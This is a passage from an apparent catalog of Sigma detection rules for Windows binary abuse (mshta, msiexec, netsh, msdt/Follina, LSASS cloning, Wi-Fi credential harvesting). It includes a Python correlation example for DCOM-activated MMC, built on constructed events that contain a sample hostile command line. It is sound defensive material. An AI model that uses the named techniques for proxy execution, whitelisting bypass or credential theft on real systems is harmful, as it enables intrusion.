Detects usage of the OpenConsole binary as a LOLBIN to launch other binaries and bypass application whitelisting |
https://twitter.com/nas_bench/status/1537563834478645252 |
OpenWith.exe Executes Specified Binary |
Detects OpenWith.exe being used to execute another binary |
https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml, https://twitter.com/harr0ey/status/991670870384021504 |
Use of Pcalua For Execution |
Detects execution of commands and binaries from the context of the Program Compatibility Assistant (Pcalua.exe). This can be used as a LOLBIN to bypass application whitelisting. |
https://lolbas-project.github.io/lolbas/Binaries/Pcalua/, https://pentestlab.blog/2020/07/06/indirect-command-execution/ |
Indirect Command Execution By Program Compatibility Wizard |
Detects indirect command execution via the Program Compatibility Assistant pcwrun.exe |
https://twitter.com/pabraeken/status/991335019833708544, https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/ |
Execute Pcwrun.EXE To Leverage Follina |
Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability |
https://twitter.com/nas_bench/status/1535663791362519040 |
Code Execution via Pcwutl.dll |
Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library. |
https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/, https://twitter.com/harr0ey/status/989617817849876488 |
Execute Code with Pester.bat as Parent |
Detects code execution via Pester.bat (Pester, the PowerShell testing module) |
https://twitter.com/Oddvarmoe/status/993383596244258816, https://twitter.com/_st0pp3r_/status/1560072680887525378 |
Execute Code with Pester.bat |
Detects code execution via Pester.bat (Pester, the PowerShell testing module) |
https://twitter.com/Oddvarmoe/status/993383596244258816, https://github.com/api0cradle/LOLBAS/blob/d148d278f5f205ce67cfaf49afdfb68071c7252a/OSScripts/pester.md |
PrintBrm ZIP Creation or Extraction |
Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation. |
https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/ |
Pubprn.vbs Proxy Execution |
Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands. |
https://lolbas-project.github.io/lolbas/Scripts/Pubprn/ |
DLL Execution via Rasautou.exe |
Detects use of Rasautou.exe to load an arbitrary DLL specified with the -d option and execute the export specified with -p. |
https://lolbas-project.github.io/lolbas/Binaries/Rasautou/, https://github.com/fireeye/DueDLLigence, https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html |
REGISTER_APP.VBS Proxy Execution |
Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application. |
https://twitter.com/sblmsrsn/status/1456613494783160325?s=20 |
Use of Remote.exe |
Detects use of Remote.exe, part of WinDbg in the Windows SDK, which can be used for AWL bypass and for running remote files. |
https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/ |
Replace.exe Usage |
Detects the use of Replace.exe, which can be used to replace a file with another file |
https://lolbas-project.github.io/lolbas/Binaries/Replace/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/replace |
Lolbin Runexehelper Use As Proxy |
Detects usage of the "runexehelper.exe" binary as a proxy to launch other programs |
https://twitter.com/0gtweet/status/1206692239839289344, https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/ |
Suspicious Runscripthelper.exe |
Detects execution of PowerShell scripts via Runscripthelper.exe |
https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/ |
Use of Scriptrunner.exe |
Detects use of the "ScriptRunner.exe" binary, which can be abused to proxy execution and bypass application whitelisting |
https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/ |
Using SettingSyncHost.exe as LOLBin |
Detects use of SettingSyncHost.exe to run a hijacked binary |
https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin |
Use Of The SFTP.EXE Binary As A LOLBIN |
Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag |
https://github.com/LOLBAS-Project/LOLBAS/pull/264 |
Suspicious Certreq Command to Download |
Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files |
https://lolbas-project.github.io/lolbas/Binaries/Certreq/ |
Suspicious Driver Install by pnputil.exe |
Detects a possibly suspicious driver being installed via the pnputil.exe LOLBIN |
https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax, https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html |
Suspicious GrpConv Execution |
Detects suspicious execution of GrpConv.exe, the utility for converting Windows 3.x .grp files, which can be abused for persistence by malicious software or actors |
https://twitter.com/0gtweet/status/1526833181831200770 |
Dumping Process via Sqldumper.exe |
Detects process dump via legitimate sqldumper.exe binary |
https://twitter.com/countuponsec/status/910977826853068800, https://twitter.com/countuponsec/status/910969424215232518, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/ |
SyncAppvPublishingServer Execute Arbitrary PowerShell Code |
Detects execution of arbitrary PowerShell code via SyncAppvPublishingServer.exe |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ |
SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code |
Detects execution of arbitrary PowerShell code via SyncAppvPublishingServer.vbs |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md, https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ |
Potential DLL Injection Or Execution Using Tracker.exe |
Detects potential DLL injection and execution using "Tracker.exe" |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/ |
Use of TTDInject.exe |
Detects the execution of TTDInject.exe, which Windows 10 v1809 and newer uses for Time Travel Debugging (it is invoked under the hood by tttracer.exe) |
https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/ |
Time Travel Debugging Utility Usage |
Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. |
https://lolbas-project.github.io/lolbas/Binaries/Tttracer/, https://twitter.com/mattifestation/status/1196390321783025666, https://twitter.com/oulusoyum/status/1191329746069655553 |
Lolbin Unregmp2.exe Use As Proxy |
Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe" |
https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/ |
UtilityFunctions.ps1 Proxy Dll |
Detects the use of a Microsoft signed script executing a managed DLL with PowerShell. |
https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/ |
Use of VisualUiaVerifyNative.exe |
Detects use of VisualUiaVerifyNative.exe, a Windows SDK binary that can be used for AWL bypass and is listed in Microsoft's recommended block rules |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac, https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/, https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad |
Visual Basic Command Line Compiler Usage |
Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter. |
https://lolbas-project.github.io/lolbas/Binaries/Vbc/ |
Use of VSIISExeLauncher.exe |
Detects use of the "VSIISExeLauncher.exe" binary, part of Visual Studio / VS Code, which can be used to execute arbitrary binaries |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/ |
Use of Wfc.exe |
Detects use of the Workflow Command-line Compiler (Wfc.exe), which can be used for AWL bypass and is listed in Microsoft's recommended block rules |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac |
Potential Register_App.Vbs LOLScript Abuse |
Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution. |
https://twitter.com/sblmsrsn/status/1456613494783160325?s=20, https://github.com/microsoft/Windows-classic-samples/blob/7cbd99ac1d2b4a0beffbaba29ea63d024ceff700/Samples/Win7Samples/winbase/vss/vsssampleprovider/register_app.vbs |
Potential Credential Dumping Via LSASS Process Clone |
Detects a suspicious LSASS process clone that could be a sign of credential dumping activity |
https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/, https://twitter.com/Hexacorn/status/1420053502554951689, https://twitter.com/SBousseaden/status/1464566846594691073?s=20 |
Potential Mftrace.EXE Abuse |
Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe), which can be abused to execute arbitrary binaries. |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/ |
MMC20 Lateral Movement |
Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe |
https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/, https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing |
MMC Spawning Windows Shell |
Detects a Windows command line executable started from MMC |
https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ |
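The two MMC entries above describe two halves of one chain: svchost.exe (DCOM activation) spawning mmc.exe with "-Embedding", then mmc.exe spawning a shell. Below is an added Python example, not the Sigma rules' own logic, that implements each check and correlates them through ProcessId / ParentProcessId so the full chain surfaces as one finding. Assumptions: Sysmon-style events with Image, CommandLine, ParentImage, ProcessId and ParentProcessId; the shell list is illustrative; all events are constructed, not captured.

```python
"""Correlate DCOM-activated mmc.exe with the shell it spawns.
Added example; assumptions are listed in the lead-in above."""
from pathlib import PureWindowsPath
from typing import Dict, List

# Illustrative set of "shell-like" children worth flagging under mmc.exe.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
          "cscript.exe", "rundll32.exe", "regsvr32.exe"}


def _name(path) -> str:
    return PureWindowsPath(path or "").name.lower()


def is_mmc20_dcom_spawn(ev: dict) -> bool:
    """mmc.exe activated out-of-process by DCOM: parent is svchost.exe and the
    command line carries -Embedding (the MMC20.Application technique)."""
    return (_name(ev.get("Image")) == "mmc.exe"
            and _name(ev.get("ParentImage")) == "svchost.exe"
            and "-embedding" in (ev.get("CommandLine") or "").lower())


def is_mmc_spawning_shell(ev: dict) -> bool:
    """A command-line executable started directly by mmc.exe."""
    return _name(ev.get("ParentImage")) == "mmc.exe" and _name(ev.get("Image")) in SHELLS


def correlate_mmc20_chains(events: List[dict]) -> List[dict]:
    """One finding per shell whose parent is a DCOM-activated mmc.exe."""
    dcom_mmc: Dict[int, dict] = {ev["ProcessId"]: ev for ev in events if is_mmc20_dcom_spawn(ev)}
    findings = []
    for ev in events:
        if is_mmc_spawning_shell(ev) and ev.get("ParentProcessId") in dcom_mmc:
            findings.append({"mmc_pid": ev["ParentProcessId"],
                             "child": ev["Image"],
                             "cmd": ev.get("CommandLine")})
    return findings


# Constructed Sysmon-style events (not real telemetry).
SAMPLE_EVENTS: List[dict] = [
    {"ProcessId": 900, "ParentProcessId": 600,
     "Image": "C:\\Windows\\System32\\svchost.exe",
     "CommandLine": "C:\\Windows\\system32\\svchost.exe -k DcomLaunch",
     "ParentImage": "C:\\Windows\\System32\\services.exe"},
    {"ProcessId": 4100, "ParentProcessId": 900,
     "Image": "C:\\Windows\\System32\\mmc.exe",
     "CommandLine": "\"C:\\Windows\\system32\\mmc.exe\" -Embedding",
     "ParentImage": "C:\\Windows\\System32\\svchost.exe"},
    {"ProcessId": 4120, "ParentProcessId": 4100,
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c whoami > C:\\Windows\\Temp\\o.txt",
     "ParentImage": "C:\\Windows\\System32\\mmc.exe"},
    {"ProcessId": 5000, "ParentProcessId": 3000,      # interactive admin console
     "Image": "C:\\Windows\\System32\\mmc.exe",
     "CommandLine": "\"C:\\Windows\\system32\\mmc.exe\" C:\\Windows\\system32\\eventvwr.msc",
     "ParentImage": "C:\\Windows\\explorer.exe"},
    {"ProcessId": 5010, "ParentProcessId": 5000,      # shell from that console
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe",
     "ParentImage": "C:\\Windows\\System32\\mmc.exe"},
]


if __name__ == "__main__":
    for f in correlate_mmc20_chains(SAMPLE_EVENTS):
        print(f)
```

On its own the second check also fires for PID 5010, a shell launched from an interactively opened console; the correlation ties the alert to the DCOM activation and leaves that case as a lower-severity hit. In production the lookup should also be bounded in time, since Windows reuses PIDs.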
CodePage Modification Via MODE.COM To Russian Language |
Detects a code page modification using the "mode.com" utility to a Russian code page.
This behavior has been used by threat actors behind Dharma ransomware.
|
https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mode, https://strontic.github.io/xcyclopedia/library/mode.com-59D1ED51ACB8C3D50F1306FD75F20E99.html, https://www.virustotal.com/gui/file/5e75ef02517afd6e8ba6462b19217dc4a5a574abb33d10eb0f2bab49d8d48c22/behavior |
Potential Suspicious Mofcomp Execution |
Detects execution of the "mofcomp" utility as a child of a suspicious shell or script-running utility, or with a suspicious path in the command line.
The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.
Attackers abuse this utility to install malicious MOF files.
|
https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/, https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml, https://learn.microsoft.com/en-us/windows/win32/wmisdk/mofcomp |
Potential Mpclient.DLL Sideloading Via Defender Binaries |
Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory. |
https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool |
File Download Via Windows Defender MpCmdRun.EXE |
Detects the use of Windows Defender MpCmdRun.EXE to download files |
https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866, https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/ |
Suspicious Msbuild Execution By Uncommon Parent Process |
Detects suspicious execution of 'Msbuild.exe' by an uncommon parent process |
https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/, https://www.echotrail.io/insights/search/msbuild.exe |
Windows Defender Definition Files Removed |
Detects the removal of Windows Defender definition files; adversaries may do this to disable security tools and avoid detection of their tools and activities |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ |
Potential Arbitrary Command Execution Using Msdt.EXE |
Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability |
https://twitter.com/nao_sec/status/1530196847679401984, https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/, https://twitter.com/_JohnHammond/status/1531672601067675648 |
Suspicious Cabinet File Execution Via Msdt.EXE |
Detects execution of msdt.exe using the "cab" flag, which could indicate suspicious diagcab files with embedded answer files leveraging CVE-2022-30190 |
https://twitter.com/nas_bench/status/1537896324837781506, https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0, https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd |
Arbitrary File Download Via MSEDGE_PROXY.EXE |
Detects usage of "msedge_proxy.exe" to download arbitrary files |
https://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/ |
Suspicious MSDT Parent Process |
Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation |
https://twitter.com/nao_sec/status/1530196847679401984, https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/ |
Remotely Hosted HTA File Executed Via Mshta.EXE |
Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file |
https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html |
Wscript Shell Run In CommandLine |
Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command line, which could indicate suspicious activity |
https://web.archive.org/web/20220830122045/http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html, https://blog.talosintelligence.com/modernloader-delivers-multiple-stealers-cryptominers-and-rats/ |
Suspicious JavaScript Execution Via Mshta.EXE |
Detects execution of JavaScript code using "mshta.exe". |
https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md |
Potential LethalHTA Technique Execution |
Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process |
https://codewhitesec.blogspot.com/2018/07/lethalhta.html |
Suspicious MSHTA Child Process |
Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution |
https://www.trustedsec.com/july-2015/malicious-htas/ |
MSHTA Suspicious Execution 01 |
Detects suspicious mshta.exe execution patterns, sometimes involving file polyglotism |
http://blog.sevagas.com/?Hacking-around-HTA-files, https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356, https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/xml/xslt/xslt-stylesheet-scripting-using-msxsl-script, https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997, https://twitter.com/mattifestation/status/1326228491302563846 |
Suspicious Mshta.EXE Execution Patterns |
Detects suspicious mshta process execution patterns |
https://en.wikipedia.org/wiki/HTML_Application, https://www.echotrail.io/insights/search/mshta.exe, https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ |
DllUnregisterServer Function Call Via Msiexec.EXE |
Detects MsiExec loading a DLL and calling its DllUnregisterServer function |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md, https://lolbas-project.github.io/lolbas/Binaries/Msiexec/, https://twitter.com/_st0pp3r_/status/1583914515996897281 |
Suspicious MsiExec Embedding Parent |
Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md |
Suspicious Msiexec Execute Arbitrary DLL |
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).
|
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md, https://twitter.com/_st0pp3r_/status/1583914515996897281 |
Msiexec Quiet Installation |
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).
|
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md, https://twitter.com/_st0pp3r_/status/1583914244344799235 |
Suspicious Msiexec Quiet Install From Remote Location |
Detects usage of Msiexec.exe to quietly install packages hosted at a remote location |
https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ |
Potential MsiExec Masquerading |
Detects the execution of msiexec.exe from an uncommon directory |
https://twitter.com/200_okay_/status/1194765831911215104 |
MsiExec Web Install |
Detects suspicious msiexec process starts with web addresses as a parameter |
https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/ |
Arbitrary File Download Via MSOHTMED.EXE |
Detects usage of "MSOHTMED" to download arbitrary files |
https://github.com/LOLBAS-Project/LOLBAS/pull/238/files |
Arbitrary File Download Via MSPUB.EXE |
Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files |
https://github.com/LOLBAS-Project/LOLBAS/pull/238/files |
Potential Process Injection Via Msra.EXE |
Detects potential process injection via Microsoft Remote Assistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been abused by many threat actors for discovery and persistence tactics |
https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/, https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf |
Detection of PowerShell Execution via Sqlps.exe |
This rule detects execution of PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with Microsoft SQL Server.
Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
|
https://learn.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/, https://twitter.com/bryon_/status/975835709587075072 |
SQL Client Tools PowerShell Session Detection |
This rule detects execution of PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with Microsoft SQL Server Management Studio.
Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
|
https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml, https://twitter.com/pabraeken/status/993298228840992768 |
Suspicious Child Process Of SQL Server |
Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection. |
Internal Research |
Suspicious Child Process Of Veeam Database |
Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection. |
https://labs.withsecure.com/publications/fin7-target-veeam-servers |
Potential MSTSC Shadowing Activity |
Detects RDP session hijacking by using MSTSC shadowing |
https://twitter.com/kmkz_security/status/1220694202301976576, https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet |
New Remote Desktop Connection Initiated Via Mstsc.EXE |
Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server.
Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc |
Mstsc.EXE Execution With Local RDP File |
Detects potential RDP connection via Mstsc using a local ".rdp" file |
https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/, https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/ |
Suspicious Mstsc.EXE Execution With Local RDP File |
Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. |
https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/, https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/ |
Mstsc.EXE Execution From Uncommon Parent |
Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. |
https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/, https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/ |
Msxsl.EXE Execution |
Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files.
Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/ |
Remote XSL Execution Via Msxsl.EXE |
Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/ |
New Firewall Rule Added Via Netsh.EXE |
Detects the addition of a new rule to the Windows firewall via netsh |
https://web.archive.org/web/20190508165435/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf |
Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE |
Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall |
https://www.virusradar.com/en/Win32_Kasidet.AD/description, https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100 |
RDP Connection Allowed Via Netsh.EXE |
Detects usage of the netsh command to open and allow connections to port 3389 (RDP), as seen used by Sarwent malware |
https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/ |
Firewall Rule Deleted Via Netsh.EXE |
Detects the removal of a port or application rule in the Windows Firewall configuration using netsh |
https://app.any.run/tasks/8bbd5b4c-b82d-4e6d-a3ea-d454594a37cc/ |
Firewall Disabled via Netsh.EXE |
Detects netsh commands that turn off the Windows firewall |
https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/, https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall |
Netsh Allow Group Policy on Microsoft Defender Firewall |
Adversaries may modify system firewalls in order to bypass controls limiting network usage |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall, https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior |
Firewall Configuration Discovery Via Netsh.EXE |
Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules, https://ss64.com/nt/netsh.html |
Firewall Rule Update Via Netsh.EXE |
Detects execution of netsh with the "advfirewall" and "set" options in order to set new values for properties of an existing rule |
https://ss64.com/nt/netsh.html |
Potential Persistence Via Netsh Helper DLL |
Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md, https://github.com/outflanknl/NetshHelperBeacon, https://web.archive.org/web/20160928212230/https://www.adaptforward.com/2016/09/using-netshell-to-execute-evil-dlls-and-persist-on-a-host/ |
New Network Trace Capture Started Via Netsh.EXE |
Detects the execution of netsh with the "trace" flag in order to start a network capture |
https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/, https://klausjochem.me/2016/02/03/netsh-the-cyber-attackers-tool-of-choice/ |
New Port Forwarding Rule Added Via Netsh.EXE |
Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule |
https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html, https://adepts.of0x.cc/netsh-portproxy-code/, https://www.dfirnotes.net/portproxy_detection/ |
RDP Port Forwarding Rule Added Via Netsh.EXE |
Detects the execution of netsh to configure a port forwarding rule for port 3389 (RDP) |
https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html |
Harvesting Of Wifi Credentials Via Netsh.EXE |
Detects the harvesting of Wi-Fi credentials using netsh.exe |
https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/ |
Suspicious Group And Account Reconnaissance Activity Using Net.EXE |
Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE
Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)
|
https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/, https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/, https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/ |
Unmount Share Via Net.EXE |
Detects when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md |
Start Windows Service Via Net.EXE |
